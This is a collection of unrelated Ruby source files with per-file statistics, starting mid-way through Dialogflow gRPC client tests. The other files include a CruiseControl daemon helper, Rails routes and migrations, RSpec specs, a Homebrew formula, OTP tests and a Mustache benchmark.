options client.suggest_articles(::Google::Cloud::Dialogflow::V2beta1::SuggestArticlesRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, suggest_articles_client_stub.call_rpc_count end end def test_suggest_faq_answers # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::SuggestFaqAnswersResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. 
parent = "hello world" latest_message = "hello world" context_size = 42 suggest_faq_answers_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :suggest_faq_answers, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::SuggestFaqAnswersRequest, request assert_equal "hello world", request["parent"] assert_equal "hello world", request["latest_message"] assert_equal 42, request["context_size"] refute_nil options end Gapic::ServiceStub.stub :new, suggest_faq_answers_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.suggest_faq_answers({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.suggest_faq_answers parent: parent, latest_message: latest_message, context_size: context_size do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.suggest_faq_answers ::Google::Cloud::Dialogflow::V2beta1::SuggestFaqAnswersRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.suggest_faq_answers({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.suggest_faq_answers(::Google::Cloud::Dialogflow::V2beta1::SuggestFaqAnswersRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, suggest_faq_answers_client_stub.call_rpc_count end end def test_suggest_smart_replies # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::SuggestSmartRepliesResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. 
parent = "hello world" current_text_input = {} latest_message = "hello world" context_size = 42 suggest_smart_replies_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :suggest_smart_replies, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::SuggestSmartRepliesRequest, request assert_equal "hello world", request["parent"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::TextInput), request["current_text_input"] assert_equal "hello world", request["latest_message"] assert_equal 42, request["context_size"] refute_nil options end Gapic::ServiceStub.stub :new, suggest_smart_replies_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.suggest_smart_replies({ parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.suggest_smart_replies parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.suggest_smart_replies ::Google::Cloud::Dialogflow::V2beta1::SuggestSmartRepliesRequest.new(parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.suggest_smart_replies({ parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.suggest_smart_replies(::Google::Cloud::Dialogflow::V2beta1::SuggestSmartRepliesRequest.new(parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, suggest_smart_replies_client_stub.call_rpc_count end end def test_list_suggestions # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::ListSuggestionsResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. 
parent = "hello world" page_size = 42 page_token = "hello world" filter = "hello world" list_suggestions_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :list_suggestions, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::ListSuggestionsRequest, request assert_equal "hello world", request["parent"] assert_equal 42, request["page_size"] assert_equal "hello world", request["page_token"] assert_equal "hello world", request["filter"] refute_nil options end Gapic::ServiceStub.stub :new, list_suggestions_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.list_suggestions({ parent: parent, page_size: page_size, page_token: page_token, filter: filter }) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use named arguments client.list_suggestions parent: parent, page_size: page_size, page_token: page_token, filter: filter do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use protobuf object client.list_suggestions ::Google::Cloud::Dialogflow::V2beta1::ListSuggestionsRequest.new(parent: parent, page_size: page_size, page_token: page_token, filter: filter) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use hash object with options client.list_suggestions({ parent: parent, page_size: page_size, page_token: page_token, filter: filter }, grpc_options) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use protobuf object with options client.list_suggestions(::Google::Cloud::Dialogflow::V2beta1::ListSuggestionsRequest.new(parent: parent, page_size: page_size, page_token: page_token, filter: filter), grpc_options) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, list_suggestions_client_stub.call_rpc_count end end def test_compile_suggestion # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::CompileSuggestionResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. 
parent = "hello world" latest_message = "hello world" context_size = 42 compile_suggestion_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :compile_suggestion, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::CompileSuggestionRequest, request assert_equal "hello world", request["parent"] assert_equal "hello world", request["latest_message"] assert_equal 42, request["context_size"] refute_nil options end Gapic::ServiceStub.stub :new, compile_suggestion_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.compile_suggestion({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.compile_suggestion parent: parent, latest_message: latest_message, context_size: context_size do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.compile_suggestion ::Google::Cloud::Dialogflow::V2beta1::CompileSuggestionRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.compile_suggestion({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.compile_suggestion(::Google::Cloud::Dialogflow::V2beta1::CompileSuggestionRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, compile_suggestion_client_stub.call_rpc_count end end def test_configure grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure client = block_config = config = nil Gapic::ServiceStub.stub :new, nil do client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end end config = client.configure do |c| block_config = c end assert_same block_config, config assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::Participants::Client::Configuration, config end end
43.718973
312
0.73322
4a198ee6b1bba1f8a8791f0ecaf1c8e13533e0e3
1,632
# Features of this script:
# * No need to modify, configurable via calling script
# * Runs as correct user even on system boot
# * Allows control over cruise environment and start command
# * Logs environment and startup errors to help debug failures when cruise is started via system boot
# * Returns correct return codes from cruise start/stop commands (but there are still issues, see http://tinyurl.com/69ary5)
# * Ensures log files are owned by cruise user, not root

require "fileutils"
include FileUtils
require "rubygems"
begin
  gem 'mongrel'
rescue => e
  puts "Error: daemon mode of CC.rb requires mongrel installed"
  exit 1
end

def log(log_suffix, output)
  init_log_cmd = "touch #{CRUISE_HOME}/log/cruise_daemon_#{log_suffix}.log"
  system(su_if_needed(init_log_cmd))
  File.open("#{CRUISE_HOME}/log/cruise_daemon_#{log_suffix}.log", "a+"){|f| f << output + "\n\n"}
end

def su_if_needed(cmd)
  # Run the command as-is when already executing as the cruise user;
  # otherwise wrap it in `su` so it runs as that user.
  return cmd if CRUISE_USER == ENV['USER']
  "su - #{CRUISE_USER} -c '#{cmd}'"
end

def start_cruise(start_cmd = "cd #{CRUISE_HOME} && ./cruise start -d")
  log(:env, ENV.inspect)
  output = `#{su_if_needed(start_cmd)} 2>&1`
  if $?.success?
    print output + "\n"
    exit 0
  else
    log(:err, output)
    print output + "\n"
    exit 1
  end
end

def stop_cruise
  failed = false
  failed ||= !(system "mongrel_rails stop -P #{CRUISE_HOME}/tmp/pids/mongrel.pid")

  Dir["#{CRUISE_HOME}/tmp/pids/builders/*.pid"].each do |pid_file|
    pid = File.open(pid_file){|f| f.read }
    failed ||= !(system "kill -9 #{pid}")
    rm pid_file
  end

  if failed
    log(:err, "'stop' command failed")
    exit 1
  else
    exit 0
  end
end
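The header comment above says the daemon code is meant to be driven by a separate calling script that supplies the environment. A minimal sketch of such a wrapper, assuming only the constant names this file reads (CRUISE_HOME, CRUISE_USER); the install path and the required filename are placeholders, not taken from the original project:

#!/usr/bin/env ruby
# Hypothetical init-style wrapper: define the environment, load the shared daemon
# helpers above (filename assumed), then dispatch on the requested action.
CRUISE_HOME = '/var/www/cruisecontrolrb'
CRUISE_USER = 'cruise'
require File.join(File.dirname(__FILE__), 'cruise_daemon_common')

case ARGV.first
when 'start' then start_cruise
when 'stop'  then stop_cruise
else
  puts "Usage: #{$0} {start|stop}"
  exit 1
end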
27.661017
124
0.685662
ff1c2391b58c0aa107e1c2d53d1a8c594939143d
289
def power_number(base, power)
  aux = 0
  result = 1
  until aux == power
    aux += 1
    result *= base
  end
  # If the method body has no explicit "return",
  # it returns the last value evaluated on its final line.
  # In this case, that is result itself.
  result
end
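A quick usage sketch with made-up inputs, illustrating the implicit-return behaviour the comment above describes:

# The value of `result` on the method's final line is what the caller receives.
power_number(2, 10) # => 1024
power_number(5, 0)  # => 1 (the loop never runs, so the initial result is returned)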
18.0625
64
0.67128
016ed26594d9985fe1dd3a0d801306a8b1b2b1ce
1,093
{ matrix_id: '581', name: 'mark3jac020sc', group: 'Hollinger', description: 'Jacobian from MULTIMOD Mark3, oldstack 020 (scaled)', author: 'P. Hollinger', editor: 'T. Davis', date: '2001', kind: 'economic problem', problem_2D_or_3D: '0', num_rows: '9129', num_cols: '9129', nonzeros: '52883', num_explicit_zeros: '3292', num_strongly_connected_components: '321', num_dmperm_blocks: '321', structural_full_rank: 'true', structural_rank: '9129', pattern_symmetry: '0.074', numeric_symmetry: '0.007', rb_type: 'real', structure: 'unsymmetric', cholesky_candidate: 'no', positive_definite: 'no', norm: '2.344687e+06', min_singular_value: '2.792123e-08', condition_number: '8.397506e+13', svd_rank: '9102', sprank_minus_rank: '27', null_space_dimension: '27', full_numerical_rank: 'no', svd_gap: '1.201678', image_files: 'mark3jac020sc.png,mark3jac020sc_dmperm.png,mark3jac020sc_scc.png,mark3jac020sc_svd.png,mark3jac020sc_APlusAT_graph.gif,mark3jac020sc_graph.gif,', }
31.228571
163
0.671546
bba26c758d2a57bbf31da4c71ec445d7b7f95893
3,159
class PlaceInfectionCommand prepend SimpleCommand def initialize(game:, staticid:, quantity:, color: nil, outbreakids: []) @game = game @staticid = staticid @quantity = quantity @color = color || city.color @outbreakids = outbreakids end def call set_before_quantity infection.update!(quantity: quantities.min) if can_infect? trigger_outbreak if outbreak? check_infections_used end private attr_reader :game, :color def trigger_outbreak @outbreakids << @staticid game.increment!(:outbreaks_nr) game.finished! if game.outbreaks_nr == 8 city.neighbors.each do |neighbor| next if @outbreakids.include?(neighbor.staticid) PlaceInfectionCommand.new( game: game, staticid: neighbor.staticid, quantity: 1, color: city.color, outbreakids: @outbreakids ).call end end def infection @infection ||= game.infections .find_or_create_by!(color: color, city_staticid: @staticid) end def total_quantity @total_quantity ||= infection.quantity + @quantity end def city @city ||= City.find(@staticid) end def other_infections_total_quantity @other_infections_total_quantity ||= game.infections .where(city_staticid: @staticid) .where.not(color: color) .total_quantity end def quantities [total_quantity, 3 - other_infections_total_quantity] end def set_before_quantity @before_quantity ||= game.infections .where(city_staticid: @staticid) .total_quantity end def outbreak? @before_quantity + @quantity > 3 end def can_infect? return false if neighboring_location_includes_quarantine_specialist? return false if players_at_current_location.include?(quarantine_specialist) return false if medic_prevents_infection? return false if disease_eradicated? true end def medic game.players.find_by(role: Player.roles.keys[2]) end def quarantine_specialist game.players.find_by(role: Player.roles.keys[4]) end def cure_marker game.cure_markers.find_by(color: color) end def neighboring_location_includes_quarantine_specialist? players_at_neighboring_locations.include?(quarantine_specialist) end def players_at_neighboring_locations @players_at_neighboring_locations ||= game.players .where(location_staticid: city.neighbors_staticids) end def medic_prevents_infection? players_at_current_location.include?(medic) && cure_marker&.cured? end def players_at_current_location @players_at_current_location ||= game.players .where(location_staticid: @staticid) end def check_infections_used CureMarker.colors.keys.each do |color| check_infections(color: color) end end def check_infections(color:) infection_quantity = all_infections.select do |infection| infection.color == color end.sum(&:quantity) game.finished! if infection_quantity >= 24 end def all_infections @all_infections ||= game.infections end def disease_eradicated? game.cure_markers.find_by(color: city.color)&.eradicated? end end
23.931818
79
0.721431
e8fadf1ae00e8d8f652e2f37a56250ca5bcc86c8
607
class SoftDelete < ActiveRecord::Migration def change add_column :organizations, :deleted_at, :datetime add_index :organizations, :deleted_at add_column :assignments, :deleted_at, :datetime add_index :assignments, :deleted_at add_column :assignment_invitations, :deleted_at, :datetime add_index :assignment_invitations, :deleted_at add_column :group_assignments, :deleted_at, :datetime add_index :group_assignments, :deleted_at add_column :group_assignment_invitations, :deleted_at, :datetime add_index :group_assignment_invitations, :deleted_at end end
31.947368
68
0.771005
f7136f97bb3d90b09ec8184519b605ee137cc178
1,514
require "tmpdir" require "pathname" module Resume module CLI # Module containing functions concerning interacting with the # local file system. # # @author Paul Fioravanti module FileSystem # Represents the ?dl=1 parameter on a Dropbox link. DOWNLOAD_PARAMETER_REGEX = /\?.+\z/ private_constant :DOWNLOAD_PARAMETER_REGEX module_function # Attempts to open a file in a system-appropriate way. # # @param filename [String] The filename to open. # @return [true] if the document can be opened successfully. # @return [false] if the document cannot be opened successfully. # @return [nil] if it is unknown how to attempt to open the document. def open_document(filename) case RUBY_PLATFORM when /darwin/ system("open", filename) when /linux/ system("xdg-open", filename) when /windows/ system("cmd", "/c", "\"start #{filename}\"") else Output.warning(:dont_know_how_to_open_resume) end end # Derive a system-independent tmpfile path from a `filename`. # # @param filename [String] The filename to create a tmpfile path for. # @return [Pathname] The generated tmpfile pathname for `filename`. def tmpfile_path(filename) # Ensure that the ?dl=1 parameter is removed Pathname.new(Dir.tmpdir).join( filename.sub(DOWNLOAD_PARAMETER_REGEX, "") ) end end end end
30.897959
75
0.635403
edc09532add4fb4fff91d6b9cf56abe365839ab1
373
Rails.application.routes.draw do root 'static_pages#home' get '/help', to: 'static_pages#help' get '/about', to: 'static_pages#about' get '/contact', to: 'static_pages#contact' get '/signup', to: 'users#new' get '/login', to: 'sessions#new' post '/login', to: 'sessions#create' delete '/logout', to: 'sessions#destroy' resources :users end
31.083333
45
0.648794
1a3f039090e8fa22c2389b797c6b182206855982
2,266
if ENV['SIMPLECOV'] require 'simplecov' SimpleCov.start end if ENV['COVERALLS'] require 'coveralls' Coveralls.wear_merged! end require 'factory_girl' require 'composer' # Requires supporting ruby files with custom matchers and macros, etc, # in spec/support/ and its subdirectories. Dir[File.join(File.dirname(__FILE__), 'support/**/*.rb')].each {|f| require f } # Requires supporting ruby files with custom matchers and macros, etc, # in spec/support/ and its subdirectories. Dir[File.join(File.dirname(__FILE__), 'factories/**/*.rb')].each {|f| require f } # This file was generated by the `rspec --init` command. Conventionally, all # specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`. # Require this file using `require "spec_helper"` to ensure that it is only # loaded once. # # See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration RSpec.configure do |config| config.mock_framework = :rspec # rspec-expectations config goes here. You can use an alternate # assertion/expectation library such as wrong or the stdlib/minitest # assertions if you prefer. config.expect_with :rspec do |expectations| # This option will default to `true` in RSpec 4. It makes the `description` # and `failure_message` of custom matchers include text for helper methods # defined using `chain`, e.g.: # be_bigger_than(2).and_smaller_than(4).description # # => "be bigger than 2 and smaller than 4" # ...rather than: # # => "be bigger than 2" expectations.include_chain_clauses_in_custom_matcher_descriptions = true end # rspec-mocks config goes here. You can use an alternate test double # library (such as bogus or mocha) by changing the `mock_with` option here. config.mock_with :rspec do |mocks| # Prevents you from mocking or stubbing a method that does not exist on # a real object. This is generally recommended, and will default to # `true` in RSpec 4. mocks.verify_partial_doubles = true end # Run specs in random order to surface order dependencies. If you find an # order dependency and want to debug it, you can fix the order by providing # the seed, which is printed after each run. # --seed 1234 config.order = 'random' end
37.147541
81
0.723742
01b4ae9c0d5e706dc7a0d71709c538113364076d
2,448
class AmplMp < Formula desc "The AMPL modeling language solver library" homepage "http://www.ampl.com" url "https://github.com/ampl/mp/archive/3.1.0.tar.gz" sha256 "587c1a88f4c8f57bef95b58a8586956145417c8039f59b1758365ccc5a309ae9" bottle do cellar :any sha256 "4bf7fc7253661a1fb16fe1b07f6b4eeeb4dcecd6303199d959c98106eb1a059b" => :sierra sha256 "43d48bd9aca07ba0b30e7aa4f43f1cbac248cc6d92d245413a698352595ef5c2" => :el_capitan sha256 "a031b84d6695d5bcb4f461af062ebf0e0afc2484966704edf27e7e847bfd8b1a" => :yosemite end option "with-matlab", "Build MEX files for use with Matlab" option "with-mex-path=", "Path to MEX executable, e.g., /path/to/MATLAB.app/bin/mex (default: mex)" option "without-test", "Skip build-time tests (not recommended)" depends_on "cmake" => :build depends_on "doxygen" => :optional resource "miniampl" do url "https://github.com/dpo/miniampl/archive/v1.0.tar.gz" sha256 "b836dbf1208426f4bd93d6d79d632c6f5619054279ac33453825e036a915c675" end def install cmake_args = ["-DCMAKE_INSTALL_PREFIX=#{prefix}", "-DCMAKE_BUILD_TYPE=None", "-DCMAKE_FIND_FRAMEWORK=LAST", "-DCMAKE_VERBOSE_MAKEFILE=ON", "-Wno-dev", "-DBUILD_SHARED_LIBS=True"] cmake_args << ("-DMATLAB_MEX=" + (ARGV.value("with-mex-path") || "mex")) if build.with? "matlab" system "cmake", ".", *cmake_args system "make", "all" system "make", "test" if build.with? "test" system "install_name_tool", "-change", "@rpath/libmp.3.dylib", lib/"libmp.dylib", "bin/libasl.dylib" if OS.mac? system "make", "install" mkdir libexec mv bin, libexec/"bin" if build.with? "matlab" mkdir_p (pkgshare/"matlab") mv Dir["#{libexec}/bin/*.mex*"], pkgshare/"matlab" end resource("miniampl").stage do system "make", "SHELL=/bin/bash", "CXX=#{ENV["CC"]} -std=c99", "LIBAMPL_DIR=#{prefix}", "LIBS=-L$(LIBAMPL_DIR)/lib -lasl -lm -ldl" bin.install "bin/miniampl" (pkgshare/"example").install "Makefile", "README.rst", "src", "examples" end end def caveats s = "" if build.with? "matlab" s += <<-EOS.undent Matlab interfaces have been installed to #{opt_pkgshare}/matlab EOS end s end test do cp Dir["#{opt_pkgshare}/example/examples/*"], testpath cd testpath do system "#{opt_bin}/miniampl", "wb", "showname=1", "showgrad=1" end end end
34.478873
136
0.669935
bbef1bdc8dc14e751b907735b0361aede7bbd2b8
6,862
require "logstash/devutils/rspec/spec_helper" require "logstash/outputs/elasticsearch" require "logstash/outputs/elasticsearch/http_client" require "logstash/outputs/elasticsearch/http_client_builder" describe LogStash::Outputs::ElasticSearch::HttpClientBuilder do describe "auth setup with url encodable passwords" do let(:klass) { LogStash::Outputs::ElasticSearch::HttpClientBuilder } let(:user) { "foo@bar"} let(:password) {"bazblah" } let(:password_secured) do secured = double("password") allow(secured).to receive(:value).and_return(password) secured end let(:options) { {"user" => user, "password" => password} } let(:logger) { mock("logger") } let(:auth_setup) { klass.setup_basic_auth(double("logger"), {"user" => user, "password" => password_secured}) } it "should return the user verbatim" do expect(auth_setup[:user]).to eql(user) end it "should return the password verbatim" do expect(auth_setup[:password]).to eql(password) end context "passwords that need escaping" do let(:password) { "foo@bar#" } it "should escape the password" do expect(auth_setup[:password]).to eql("foo%40bar%23") end end end describe "customizing action paths" do let(:hosts) { [ ::LogStash::Util::SafeURI.new("http://localhost:9200") ] } let(:options) { {"hosts" => hosts } } let(:logger) { double("logger") } before :each do [:debug, :debug?, :info?, :info, :warn].each do |level| allow(logger).to receive(level) end end describe "healthcheck_path" do context "when setting bulk_path" do let(:bulk_path) { "/meh" } let(:options) { super.merge("bulk_path" => bulk_path) } context "when using path" do let(:options) { super.merge("path" => "/path") } it "ignores the path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:bulk_path]).to eq(bulk_path) end described_class.build(logger, hosts, options) end end context "when not using path" do it "uses the bulk_path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:bulk_path]).to eq(bulk_path) end described_class.build(logger, hosts, options) end end end context "when not setting bulk_path" do context "when using path" do let(:path) { "/meh" } let(:options) { super.merge("path" => path) } it "sets bulk_path to path+_bulk" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:bulk_path]).to eq("#{path}/_bulk") end described_class.build(logger, hosts, options) end end context "when not using path" do it "sets the bulk_path to _bulk" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:bulk_path]).to eq("/_bulk") end described_class.build(logger, hosts, options) end end end end describe "healthcheck_path" do context "when setting healthcheck_path" do let(:healthcheck_path) { "/meh" } let(:options) { super.merge("healthcheck_path" => healthcheck_path) } context "when using path" do let(:options) { super.merge("path" => "/path") } it "ignores the path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:healthcheck_path]).to eq(healthcheck_path) end described_class.build(logger, hosts, options) end end context "when not using path" do it "uses the healthcheck_path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:healthcheck_path]).to eq(healthcheck_path) end described_class.build(logger, hosts, options) end end end context "when not setting healthcheck_path" do context "when using path" do let(:path) { "/meh" } let(:options) { 
super.merge("path" => path) } it "sets healthcheck_path to path" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:healthcheck_path]).to eq(path) end described_class.build(logger, hosts, options) end end context "when not using path" do it "sets the healthcheck_path to root" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:healthcheck_path]).to eq("/") end described_class.build(logger, hosts, options) end end end end describe "sniffing_path" do context "when setting sniffing_path" do let(:sniffing_path) { "/meh" } let(:options) { super.merge("sniffing_path" => sniffing_path) } context "when using path" do let(:options) { super.merge("path" => "/path") } it "ignores the path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:sniffing_path]).to eq(sniffing_path) end described_class.build(logger, hosts, options) end end context "when not using path" do it "uses the sniffing_path setting" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:sniffing_path]).to eq(sniffing_path) end described_class.build(logger, hosts, options) end end end context "when not setting sniffing_path" do context "when using path" do let(:path) { "/meh" } let(:options) { super.merge("path" => path) } it "sets sniffing_path to path+_nodes/http" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:sniffing_path]).to eq("#{path}/_nodes/http") end described_class.build(logger, hosts, options) end end context "when not using path" do it "sets the sniffing_path to _nodes/http" do expect(described_class).to receive(:create_http_client) do |options| expect(options[:sniffing_path]).to eq("/_nodes/http") end described_class.build(logger, hosts, options) end end end end end end
35.371134
115
0.598805
e9982edf1aeb345d170bb724d17a4bdbbecbb6e1
2,844
require "test_helper" class OtpTest < MiniTest::Unit::TestCase def setup @user = User.new @user.email = '[email protected]' @user.run_callbacks :create @visitor = Visitor.new @visitor.email = '[email protected]' @visitor.run_callbacks :create end def test_authenticate_with_otp code = @user.otp_code assert @user.authenticate_otp(code) code = @visitor.otp_code assert @visitor.authenticate_otp(code) end def test_authenticate_with_otp_when_drift_is_allowed code = @user.otp_code(Time.now - 30) assert @user.authenticate_otp(code, drift: 60) code = @visitor.otp_code(Time.now - 30) assert @visitor.authenticate_otp(code, drift: 60) end def test_otp_code assert_match(/^\d{6}$/, @user.otp_code.to_s) assert_match(/^\d{4}$/, @visitor.otp_code.to_s) end def test_otp_code_with_specific_length assert_match(/^\d{4}$/, @visitor.otp_code(time: 2160, padding: true).to_s) assert_operator(@visitor.otp_code(time: 2160, padding: false).to_s.length, :<= , 4) end def test_otp_code_without_specific_length assert_match(/^\d{6}$/, @user.otp_code(time: 2160, padding: true).to_s) assert_operator(@user.otp_code(time: 2160, padding: false).to_s.length, :<= , 6) end def test_otp_code_padding @user.otp_column = 'kw5jhligwqaiw7jc' assert_match(/^\d{6}$/, @user.otp_code(time: 2160, padding: true).to_s) # Modified this spec as it is not guranteed that without padding we will always # get a 3 digit number assert_operator(@user.otp_code(time: 2160, padding: false).to_s.length, :<= , 6) end def test_provisioning_uri_with_provided_account assert_match %r{otpauth://totp/roberto\?secret=\w{16}}, @user.provisioning_uri("roberto") assert_match %r{otpauth://totp/roberto\?secret=\w{16}}, @visitor.provisioning_uri("roberto") end def test_provisioning_uri_with_email_field assert_match %r{otpauth://totp/roberto@heapsource\.com\?secret=\w{16}}, @user.provisioning_uri assert_match %r{otpauth://totp/roberto@heapsource\.com\?secret=\w{16}}, @visitor.provisioning_uri end def test_provisioning_uri_with_options assert_match %r{otpauth://totp/roberto@heapsource\.com\?issuer=Example&secret=\w{16}},@user.provisioning_uri(nil,issuer: "Example") assert_match %r{otpauth://totp/roberto@heapsource\.com\?issuer=Example&secret=\w{16}}, @visitor.provisioning_uri(nil,issuer: "Example") assert_match %r{otpauth://totp/roberto\?issuer=Example&secret=\w{16}}, @user.provisioning_uri("roberto", issuer: "Example") assert_match %r{otpauth://totp/roberto\?issuer=Example&secret=\w{16}}, @visitor.provisioning_uri("roberto", issuer: "Example") end def test_regenerate_otp secret = @user.otp_column @user.otp_regenerate_secret assert secret != @user.otp_column end end
36.935065
139
0.722925
ac34956fe853906b50b561d40d496d16a3475a8e
1,042
# coding: utf-8 lib = File.expand_path('../lib', __FILE__) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) require 'nymphia/version' Gem::Specification.new do |spec| spec.name = 'nymphia' spec.version = Nymphia::VERSION spec.authors = ['mozamimy (Moza USANE)'] spec.email = ['[email protected]'] spec.summary = 'Create your SSH config without any pain.' spec.description = 'Create your SSH config without any pain.' spec.homepage = 'https://github.com/mozamimy/nymphia' spec.license = 'MIT' spec.files = `git ls-files -z`.split("\x0").reject do |f| f.match(%r{^(test|spec|features)/}) end spec.bindir = 'exe' spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) } spec.require_paths = ['lib'] spec.add_development_dependency 'bundler', '~> 1.13' spec.add_development_dependency 'rake', '~> 10.0' spec.add_development_dependency 'rspec', '~> 3.0' spec.add_development_dependency 'timecop', '~> 0.8.0' end
35.931034
74
0.645873
e8f8383d0e2dfc1b319e055434b8e07a093a9617
1,327
$:.unshift 'lib'

require 'benchmark/ips'
require 'mustache'

template = """
{{#products}}
  <div class='product_brick'>
    <div class='container'>
      <div class='element'>
        <img src='images/{{image}}' class='product_miniature' />
      </div>
      <div class='element description'>
        <a href={{url}} class='product_name block bold'>
          {{external_index}}
        </a>
      </div>
    </div>
  </div>
{{/products}}
"""

data_10 = { products: [] }
10.times do
  data_10[:products] << {
    :external_index=>"product",
    :url=>"/products/7",
    :image=>"products/product.jpg"
  }
end

data_100 = { products: [] }
100.times do
  data_100[:products] << {
    :external_index=>"product",
    :url=>"/products/7",
    :image=>"products/product.jpg"
  }
end

data_1000 = { products: [] }
1000.times do
  data_1000[:products] << {
    :external_index=>"product",
    :url=>"/products/7",
    :image=>"products/product.jpg"
  }
end

view = Mustache.new
view.template = template
view.render # Call render once so the template will be compiled

Benchmark.ips do |x|
  # benchmark-ips passes the iteration count to blocks that accept an argument,
  # so the block must perform the work that many times for the numbers to be valid.
  x.report("render list of 10") do |times|
    times.times { view.render(data_10) }
  end

  x.report("render list of 100") do |times|
    times.times { view.render(data_100) }
  end

  x.report("render list of 1000") do |times|
    times.times { view.render(data_1000) }
  end
end
17.460526
64
0.605878
7aa2f0fc0fca17d3e64acc6cc75887aa77b12acf
361
